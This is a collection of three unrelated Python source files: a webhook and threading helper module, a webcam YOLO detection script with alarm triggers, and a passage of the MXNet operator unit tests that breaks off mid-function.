helpers.py
import functools
import threading
import logging
import requests
import datetime
from requests.auth import HTTPBasicAuth
logger = logging.getLogger(__name__)
def thread_it(func):
"""A wrapper function to run func in a daemon thread.
Args:
func (function): The function to run in a thread
Returns:
function: the wrapped function.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
        return thread  # return the thread to support unit testing
return wrapper
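# Usage sketch (illustrative, not part of the original module): a function
# decorated with @thread_it returns immediately and hands back the Thread
# handle, which a unit test can join() on.
#
#     @thread_it
#     def ping(url):
#         requests.get(url)
#
#     t = ping("http://localhost:8080/health")  # hypothetical endpoint
#     t.join(timeout=5)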
def send_update(category, message, update_service_data):
"""Sends message (application updates) to an http endpoint
"""
if not update_service_data:
logger.warning(
"updateCallback in instruction is not configured properly. Request not sent to update webhook"
)
return
data = {"time": datetime.datetime.now(), "category": category, "message": message}
url = update_service_data.get('url', "")
custom_headers = update_service_data.get('customHeaders', {})
username = update_service_data.get('username', "")
password = update_service_data.get('password', "")
try:
if username:
requests.post(url,
data=data,
headers=custom_headers,
auth=HTTPBasicAuth(username, password))
else:
requests.post(url, data=data, headers=custom_headers)
except Exception as e:
logger.error(e)
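# Expected shape of update_service_data (keys taken from the lookups above;
# the values here are illustrative only):
#
#     update_service_data = {
#         "url": "https://example.com/webhook",   # hypothetical endpoint
#         "customHeaders": {"X-Token": "..."},    # optional extra headers
#         "username": "user",                     # enables HTTP basic auth
#         "password": "pass",
#     }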
camera.py
import time
import threading
import cv2
import numpy as np
from PIL import Image
from yolo import YOLO
from tools.alarm import alarm
from tools.save_csv import save_record
from tools.client import client
if __name__ == "__main__":
"""
這是用來捕捉攝影機畫面並將畫面送進模型預測的程式
"""
yolo = YOLO()
cnt_x = 0
client_cnt = 0
cap = cv2.VideoCapture(0)
start = time.time()
start_client = time.time()
    while cap.isOpened():
ret, frame = cap.read()
if ret:
frame_pil = Image.fromarray(np.uint8(cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)))
frame, count_OX = yolo.detect_image(frame_pil)
frame = cv2.cvtColor(np.asarray(frame),cv2.COLOR_RGB2BGR)
cv2.imshow("Camera",frame)
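            # count_OX is assumed to hold per-class detection counts returned by
            # detect_image; count_OX[0][1] looks like the per-frame count of one
            # class of interest. 30 consecutive frames with at least one
            # detection trigger the alarm below.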
if count_OX[0][1] >= 1:
cnt_x += 1
elif count_OX[0][1] == 0:
cnt_x = 0
if cnt_x >= 30:
cnt_x = 0
t = threading.Thread(target = alarm)
t.start()
client_cnt += 1
if (time.time() - start_client) >= 10.0:
print(time.time() - start_client)
if client_cnt >= 1:
t = threading.Thread(target = client)
t.start()
client_cnt = 0
start_client = time.time()
if (time.time() - start) >= 30.0:
t = threading.Thread(target = save_record, args = (count_OX,))
t.start()
start = time.time()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
test_operator.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
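# Unrolls cell1 and cell2 over the same input, copies cell1's parameters into
# cell2's layout, and checks that forward outputs and input gradients agree
# within the given tolerances (gradients are skipped when grad_req is 'null').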
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if grad_req != 'null':
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
else:
        assert mod1.get_input_grads()[0] is None
        assert mod2.get_input_grads()[0] is None
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
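            # Per gate, layer 0 holds input_size*state_size input weights,
            # state_size*state_size recurrent weights and two bias vectors of
            # length state_size (cuDNN-style); deeper layers take
            # state_size*directions inputs instead. The total is multiplied by
            # ngates and by the number of directions.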
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
T, N, I, H = 5, 20, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
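# e.g. np_softmax(np.array([1., 2., 3.])) ~= [0.0900, 0.2447, 0.6652]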
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
    exec1 = out.bind(default_context(),
                     args=arr,
                     args_grad=arr_grad)
    exec1.forward(is_train=True)
    out1 = exec1.outputs[0].asnumpy()
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a.asnumpy(), out_grad.asnumpy(), rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1.asnumpy(), ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad.asnumpy(), np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i].asnumpy(), gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i].asnumpy(), gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0].asnumpy(), np_out, atol=atol)
assert_almost_equal(grad_map["data"].asnumpy(), out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
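    # The gradient of SoftmaxOutput w.r.t. x is softmax(x) - onehot(label),
    # so grad_out - softmax_out should equal -onehot(label).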
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad.asnumpy(), np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x.asnumpy(), exec1.outputs[0].asnumpy())
exec1.backward(dy)
assert_almost_equal(dy.asnumpy(), dx.asnumpy())
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0].asnumpy()
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
